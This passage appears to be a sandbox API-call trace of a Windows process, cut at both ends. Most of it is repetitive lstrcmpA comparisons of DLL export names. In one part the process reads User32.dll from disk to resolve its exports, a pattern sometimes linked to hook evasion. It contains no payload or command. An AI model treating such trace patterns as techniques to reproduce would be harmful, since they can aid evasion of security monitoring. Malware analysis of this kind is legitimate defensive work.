(lpString1="AssocQueryStringW", lpString2="AssocGetPerceivedType") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocIsDangerous") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyA") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryKeyW") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringA") returned 1 [0272.299] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0272.300] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0272.300] lstrcmpA (lpString1="AssocQueryStringW", lpString2="AssocQueryStringW") returned 0 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocCreate") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocGetPerceivedType") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocIsDangerous") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyA") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryKeyW") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringA") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyA") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringByKeyW") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="AssocQueryStringW") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIA", lpString2="ChrCmpIA") returned 0 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocCreate") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocGetPerceivedType") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocIsDangerous") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyA") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryKeyW") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringA") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyA") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringByKeyW") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="AssocQueryStringW") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIA") returned 1 [0272.300] lstrcmpA (lpString1="ChrCmpIW", lpString2="ChrCmpIW") returned 0 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocCreate") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocGetPerceivedType") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocIsDangerous") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyA") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryKeyW") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringA") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyA") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringByKeyW") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="AssocQueryStringW") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIA") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ChrCmpIW") returned 1 [0272.301] lstrcmpA (lpString1="ColorAdjustLuma", lpString2="ColorAdjustLuma") returned 0 [0272.301] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocCreate") returned 1 [0272.301] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocGetPerceivedType") returned 1 [0272.301] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocIsDangerous") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyA") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryKeyW") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringA") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyA") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringByKeyW") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="AssocQueryStringW") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIA") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ChrCmpIW") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorAdjustLuma") returned 1 [0272.302] lstrcmpA (lpString1="ColorHLSToRGB", lpString2="ColorHLSToRGB") returned 0 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocCreate") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocGetPerceivedType") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocIsDangerous") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyA") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryKeyW") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringA") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyA") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringByKeyW") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="AssocQueryStringW") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIA") returned 1 [0272.302] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ChrCmpIW") returned 1 [0272.303] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorAdjustLuma") returned 1 [0272.303] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorHLSToRGB") returned 1 [0272.303] lstrcmpA (lpString1="ColorRGBToHLS", lpString2="ColorRGBToHLS") returned 0 [0272.303] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocCreate") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocGetPerceivedType") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocIsDangerous") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyA") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryKeyW") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringA") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyA") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringByKeyW") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="AssocQueryStringW") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIA") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ChrCmpIW") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorAdjustLuma") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorHLSToRGB") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ColorRGBToHLS") returned 1 [0272.466] lstrcmpA (lpString1="ConnectToConnectionPoint", lpString2="ConnectToConnectionPoint") returned 0 [0272.466] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocCreate") returned 1 [0272.466] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocGetPerceivedType") returned 1 [0272.466] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocIsDangerous") returned 1 [0272.466] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyA") returned 1 [0272.466] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryKeyW") returned 1 [0272.466] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringA") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyA") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringByKeyW") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="AssocQueryStringW") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIA") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ChrCmpIW") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorAdjustLuma") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorHLSToRGB") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ColorRGBToHLS") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="ConnectToConnectionPoint") returned 1 [0272.467] lstrcmpA (lpString1="DelayLoadFailureHook", lpString2="DelayLoadFailureHook") returned 0 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocCreate") returned 1 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocGetPerceivedType") returned 1 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocIsDangerous") returned 1 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyA") returned 1 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryKeyW") returned 1 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringA") returned 1 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyA") returned 1 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringByKeyW") returned 1 [0272.467] lstrcmpA (lpString1="DllGetClassObject", lpString2="AssocQueryStringW") returned 1 [0272.468] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIA") returned 1 [0272.468] lstrcmpA (lpString1="DllGetClassObject", lpString2="ChrCmpIW") returned 1 [0272.468] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorAdjustLuma") returned 1 [0272.468] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorHLSToRGB") returned 1 [0272.468] lstrcmpA (lpString1="DllGetClassObject", lpString2="ColorRGBToHLS") returned 1 [0272.468] lstrcmpA (lpString1="DllGetClassObject", lpString2="ConnectToConnectionPoint") returned 1 [0272.468] lstrcmpA (lpString1="DllGetClassObject", lpString2="DelayLoadFailureHook") returned 1 [0272.468] lstrcmpA (lpString1="DllGetClassObject", lpString2="DllGetClassObject") returned 0 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocCreate") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocGetPerceivedType") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocIsDangerous") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyA") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryKeyW") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringA") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyA") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringByKeyW") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="AssocQueryStringW") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIA") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="ChrCmpIW") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorAdjustLuma") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorHLSToRGB") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="ColorRGBToHLS") returned 1 [0272.468] lstrcmpA (lpString1="DllGetVersion", lpString2="ConnectToConnectionPoint") returned 1 [0272.469] lstrcmpA (lpString1="DllGetVersion", lpString2="DelayLoadFailureHook") returned 1 [0272.469] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetClassObject") returned 1 [0272.469] lstrcmpA (lpString1="DllGetVersion", lpString2="DllGetVersion") returned 0 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocCreate") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocGetPerceivedType") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocIsDangerous") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyA") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryKeyW") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringA") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyA") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringByKeyW") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="AssocQueryStringW") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIA") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ChrCmpIW") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorAdjustLuma") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorHLSToRGB") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ColorRGBToHLS") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="ConnectToConnectionPoint") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DelayLoadFailureHook") returned 1 [0272.469] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetClassObject") returned 1 [0272.470] lstrcmpA (lpString1="GUIDFromStringW", lpString2="DllGetVersion") returned 1 [0272.470] lstrcmpA (lpString1="GUIDFromStringW", lpString2="GUIDFromStringW") returned 0 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocCreate") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocGetPerceivedType") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocIsDangerous") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyA") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryKeyW") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringA") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyA") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringByKeyW") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="AssocQueryStringW") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIA") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ChrCmpIW") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorAdjustLuma") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorHLSToRGB") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ColorRGBToHLS") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="ConnectToConnectionPoint") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DelayLoadFailureHook") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetClassObject") returned 1 [0272.470] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="DllGetVersion") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GUIDFromStringW") returned -1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesA", lpString2="GetAcceptLanguagesA") returned 0 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocCreate") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocGetPerceivedType") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocIsDangerous") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyA") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryKeyW") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringA") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyA") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringByKeyW") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="AssocQueryStringW") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIA") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ChrCmpIW") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorAdjustLuma") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorHLSToRGB") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ColorRGBToHLS") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="ConnectToConnectionPoint") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DelayLoadFailureHook") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetClassObject") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="DllGetVersion") returned 1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GUIDFromStringW") returned -1 [0272.471] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesA") returned 1 [0272.472] lstrcmpA (lpString1="GetAcceptLanguagesW", lpString2="GetAcceptLanguagesW") returned 0 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocCreate") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocGetPerceivedType") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocIsDangerous") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyA") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryKeyW") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringA") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyA") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringByKeyW") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="AssocQueryStringW") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIA") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ChrCmpIW") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorAdjustLuma") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorHLSToRGB") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ColorRGBToHLS") returned 1 [0272.472] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="ConnectToConnectionPoint") returned 1 [0272.473] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DelayLoadFailureHook") returned 1 [0272.473] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetClassObject") returned 1 [0272.473] lstrcmpA (lpString1="GetMenuPosFromID", lpString2="DllGetVersion") returned 1 [0272.494] GetProcessHeap () returned 0x400000 [0272.495] HeapFree (in: hHeap=0x400000, dwFlags=0x0, lpMem=0x2c35030 | out: hHeap=0x400000) returned 1 [0272.495] GetProcessHeap () returned 0x400000 [0272.495] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x10) returned 0x419180 [0272.495] LoadLibraryA (lpLibFileName="User32.dll") returned 0x7ffc5e960000 [0272.495] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0272.495] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0272.496] GetModuleFileNameA (in: hModule=0x7ffc5e960000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll")) returned 0x1e [0272.496] CreateFileA (lpFileName="C:\\Windows\\system32\\USER32.dll" (normalized: "c:\\windows\\system32\\user32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0272.496] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0272.497] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0272.497] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1398200) returned 1 [0272.497] GetProcessHeap () returned 0x400000 [0272.497] RtlAllocateHeap (HeapHandle=0x400000, Flags=0x0, Size=0x1555b8) returned 0x3ffb040 [0272.501] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0272.501] ReadFile (in: hFile=0x17c, lpBuffer=0x3ffb040, nNumberOfBytesToRead=0x1555b8, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x3ffb040*, lpNumberOfBytesRead=0x14f5a4*=0x1555b8, lpOverlapped=0x0) returned 1 [0272.641] CloseHandle (hObject=0x17c) returned 1 [0272.641] lstrcmpA (lpString1="ActivateKeyboardLayout", lpString2="ActivateKeyboardLayout") returned 0 [0272.641] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="ActivateKeyboardLayout") returned 1 [0272.641] lstrcmpA (lpString1="AddClipboardFormatListener", lpString2="AddClipboardFormatListener") returned 0 [0272.642] lstrcmpA (lpString1="AdjustWindowRect", lpString2="ActivateKeyboardLayout") returned 1 [0272.642] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AddClipboardFormatListener") returned 1 [0272.642] lstrcmpA (lpString1="AdjustWindowRect", lpString2="AdjustWindowRect") returned 0 [0272.642] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="ActivateKeyboardLayout") returned 1 [0272.642] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AddClipboardFormatListener") returned 1 [0272.642] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRect") returned 1 [0272.642] lstrcmpA (lpString1="AdjustWindowRectEx", lpString2="AdjustWindowRectEx") returned 0 [0272.642] lstrcmpA (lpString1="AlignRects", lpString2="ActivateKeyboardLayout") returned 1 [0272.642] lstrcmpA (lpString1="AlignRects", lpString2="AddClipboardFormatListener") returned 1 [0272.642] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRect") returned 1 [0272.642] lstrcmpA (lpString1="AlignRects", lpString2="AdjustWindowRectEx") returned 1 [0272.642] lstrcmpA (lpString1="AlignRects", lpString2="AlignRects") returned 0 [0272.642] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="ActivateKeyboardLayout") returned 1 [0272.642] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AddClipboardFormatListener") returned 1 [0272.642] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRect") returned 1 [0272.642] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AdjustWindowRectEx") returned 1 [0272.642] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AlignRects") returned 1 [0272.642] lstrcmpA (lpString1="AllowForegroundActivation", lpString2="AllowForegroundActivation") returned 0 [0272.643] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="ActivateKeyboardLayout") returned 1 [0272.643] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AddClipboardFormatListener") returned 1 [0272.643] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRect") returned 1 [0272.643] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AdjustWindowRectEx") returned 1 [0272.643] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AlignRects") returned 1 [0272.643] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowForegroundActivation") returned 1 [0272.643] lstrcmpA (lpString1="AllowSetForegroundWindow", lpString2="AllowSetForegroundWindow") returned 0 [0272.643] lstrcmpA (lpString1="AnimateWindow", lpString2="ActivateKeyboardLayout") returned 1 [0272.643] lstrcmpA (lpString1="AnimateWindow", lpString2="AddClipboardFormatListener") returned 1 [0272.643] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRect") returned 1 [0272.643] lstrcmpA (lpString1="AnimateWindow", lpString2="AdjustWindowRectEx") returned 1 [0272.643] lstrcmpA (lpString1="AnimateWindow", lpString2="AlignRects") returned 1 [0272.643] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowForegroundActivation") returned 1 [0272.643] lstrcmpA (lpString1="AnimateWindow", lpString2="AllowSetForegroundWindow") returned 1 [0272.643] lstrcmpA (lpString1="AnimateWindow", lpString2="AnimateWindow") returned 0 [0272.643] lstrcmpA (lpString1="AnyPopup", lpString2="ActivateKeyboardLayout") returned 1 [0272.643] lstrcmpA (lpString1="AnyPopup", lpString2="AddClipboardFormatListener") returned 1 [0272.643] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRect") returned 1 [0272.643] lstrcmpA (lpString1="AnyPopup", lpString2="AdjustWindowRectEx") returned 1 [0272.643] lstrcmpA (lpString1="AnyPopup", lpString2="AlignRects") returned 1 [0272.643] lstrcmpA (lpString1="AnyPopup", lpString2="AllowForegroundActivation") returned 1 [0272.644] lstrcmpA (lpString1="AnyPopup", lpString2="AllowSetForegroundWindow") returned 1 [0272.644] lstrcmpA (lpString1="AnyPopup", lpString2="AnimateWindow") returned 1 [0272.644] lstrcmpA (lpString1="AnyPopup", lpString2="AnyPopup") returned 0 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="ActivateKeyboardLayout") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0272.644] lstrcmpA (lpString1="AppendMenuW", 